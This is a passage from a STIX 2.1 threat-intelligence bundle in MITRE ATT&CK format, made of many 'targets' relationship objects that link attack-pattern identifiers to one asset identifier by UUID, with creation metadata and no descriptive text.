"x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--75356906-a3b9-443c-a8d8-e0d99a13f384", "created": "2024-07-01T10:37:15.826002", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826004", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--63220765-d418-44de-8fae-694b3912317d", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--51aa8aa4-7800-4425-aa2a-2806aea4dbd5", "created": "2024-07-01T10:37:15.826012", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826015", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--633a100c-b2c9-41bf-9be5-905c1b16c825", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--fcdc7d36-049c-4c00-8871-b0170c0e0ec5", "created": "2024-07-01T10:37:15.826023", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826025", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--635cbe30-392d-4e27-978e-66774357c762", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--08eb2210-aaa4-4924-a539-0ffc5ef3a0a6", "created": "2024-07-01T10:37:15.826033", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826035", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--64196062-5210-42c3-9a02-563a0d1797ef", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f0903680-2c9f-436f-83ff-791d579c8080", "created": "2024-07-01T10:37:15.826043", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826045", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--65917ae0-b854-4139-83fe-bf2441cf0196", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--16c2364a-279c-42bd-8eff-218b18a2bd38", "created": "2024-07-01T10:37:15.826053", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826056", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--67720091-eee3-4d2d-ae16-8264567f6f5b", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b0297016-35d1-4922-a953-7f3474fb2b18", "created": "2024-07-01T10:37:15.826064", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826066", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--6831414d-bb70-42b7-8030-d4e06b2660c9", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a93c9a57-8656-4539-8ef6-bf46d80e8f91", "created": "2024-07-01T10:37:15.826074", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826076", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--692074ae-bb62-4a5e-a735-02cb6bde458c", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--614b591e-a183-4c07-9372-d5751aef9be2", "created": "2024-07-01T10:37:15.826084", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826086", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--69b8fd78-40e8-4600-ae4d-662c9d7afdb3", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b3ef79a2-6022-4b63-8e84-d8fedc56d9b1", "created": "2024-07-01T10:37:15.826094", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826096", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e3a40dfb-7244-41c7-8cfb-34c0c69f97a0", "created": "2024-07-01T10:37:15.826104", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826106", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--6add2ab5-2711-4e9d-87c8-7a0be8531530", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6556c49a-9313-4ce3-8ae9-948d2cbce846", "created": "2024-07-01T10:37:15.826114", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826117", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--6b57dc31-b814-4a03-8706-28bc20d739c4", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--58b4b25c-5220-441c-95e9-239b87040504", "created": "2024-07-01T10:37:15.826125", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826127", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--6faf650d-bf31-4eb4-802d-1000cf38efaf", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5800d1a6-cfb9-43c4-ad27-3594d74e9a2a", "created": "2024-07-01T10:37:15.826135", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826137", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a236f460-a755-4e41-914b-f93c215539f8", "created": "2024-07-01T10:37:15.826145", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826147", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--72b74d71-8169-42aa-92e0-e7b04b9f5a08", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--bf631a89-d8c8-4e76-818e-799b18cf0680", "created": "2024-07-01T10:37:15.826155", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826157", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3e962bde-432f-4791-8716-65cde47d0fb0", "created": "2024-07-01T10:37:15.826166", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826168", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e16da819-e6d5-4aa0-b347-72212ac15829", "created": "2024-07-01T10:37:15.826176", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826178", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--74d2a63f-3c7b-4852-92da-02d8fbab16da", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ed12decf-eae0-492a-b311-391236c7fcf0", "created": "2024-07-01T10:37:15.826186", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826188", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7610cada-1499-41a4-b3dd-46467b68d177", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8a8c4d37-22ff-4594-8fa0-4bdbf66d6921", "created": "2024-07-01T10:37:15.826196", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826199", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--774a3188-6ba9-4dc4-879d-d54ee48a5ce9", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9a13573b-19e7-4595-a0a1-445ec3a8ab0d", "created": "2024-07-01T10:37:15.826207", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826209", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--77eae145-55db-4519-8ae5-77b0c7215d69", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1e9f1f95-0b66-4f67-89fc-96eee89db874", "created": "2024-07-01T10:37:15.826216", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826219", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--791481f8-e96a-41be-b089-a088763083d4", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9df49316-32da-4cba-a4f0-cece2cc0dbe4", "created": "2024-07-01T10:37:15.826226", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826229", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--799ace7f-e227-4411-baa0-8868704f2a69", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c758dd77-accf-4deb-aea2-5f8236738ce0", "created": "2024-07-01T10:37:15.826237", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826239", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--79a4052e-1a89-4b09-aea6-51f1d11fe19c", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3974f280-7291-4dd3-abdb-d38fc3f529c5", "created": "2024-07-01T10:37:15.826247", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826249", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--65a91f0c-4368-4da7-b726-55eb49219cde", "created": "2024-07-01T10:37:15.826257", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826259", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7bd9c723-2f78-4309-82c5-47cad406572b", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--482d54b1-2b2b-48e3-895c-366e32f9a200", "created": "2024-07-01T10:37:15.826267", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826269", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6ec8ca1d-7eee-4d03-9154-6c9e687b96ff", "created": "2024-07-01T10:37:15.826277", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826280", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7d77a07d-02fe-4e88-8bd9-e9c008c01bf0", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6eeff87d-0d8b-4dd5-ba51-52e622594148", "created": "2024-07-01T10:37:15.826288", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826290", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9f4ccd2d-a0ac-44a5-87b8-eafb682601da", "created": "2024-07-01T10:37:15.826298", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826300", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7de1f7ac-5d0c-4c9c-8873-627202205331", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0b0aaab3-283c-4520-887d-a9f5d0552ab4", "created": "2024-07-01T10:37:15.826308", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826310", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7e150503-88e7-4861-866b-ff1ac82c4475", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3697f131-bc90-4f1a-8701-579d6a63965f", "created": "2024-07-01T10:37:15.826318", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826320", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7f0ca133-88c4-40c6-a62f-b3083a7fbc2e", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--abc4ec3c-9f7d-47c4-816a-aff1557d5200", "created": "2024-07-01T10:37:15.826328", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826330", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--54f3f0a0-ee76-42b5-bd8f-37717c96fb44", "created": "2024-07-01T10:37:15.826338", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826340", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--824add00-99a1-4b15-9a2d-6c5683b7b497", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1516b167-e397-404c-9532-b47970b0fbc5", "created": "2024-07-01T10:37:15.826348", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826350", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ce7d1acb-2808-4024-8ee5-8e3869f103ea", "created": "2024-07-01T10:37:15.826358", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826360", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--830c9528-df21-472c-8c14-a036bf17d665", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--842c5128-80b3-4978-a886-5309e090f897", "created": "2024-07-01T10:37:15.826368", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826370", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--837f9164-50af-4ac0-8219-379d8a74cefc", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--253d864c-bad4-4226-8cdc-876659ae492e", "created": "2024-07-01T10:37:15.826378", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826380", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--83a766f8-1501-4b3a-a2de-2e2849e8dfc1", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6131f6b1-31bb-4f8d-8c5a-fbb52929b978", "created": "2024-07-01T10:37:15.826388", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826391", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--84e02621-8fdf-470f-bd58-993bb6a89d91", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8446bad5-8b20-4e82-872b-d1caa0bdd302", "created": "2024-07-01T10:37:15.826404", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826406", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--851e071f-208d-4c79-adc6-5974c85c78f3", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--23d0b8e4-bd74-495d-96da-e928698ce1f1", "created": "2024-07-01T10:37:15.826414", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826417", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--853c4192-4311-43e1-bfbb-b11b14911852", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--999f66f4-64da-4fc1-bb63-554d4f9234b7", "created": 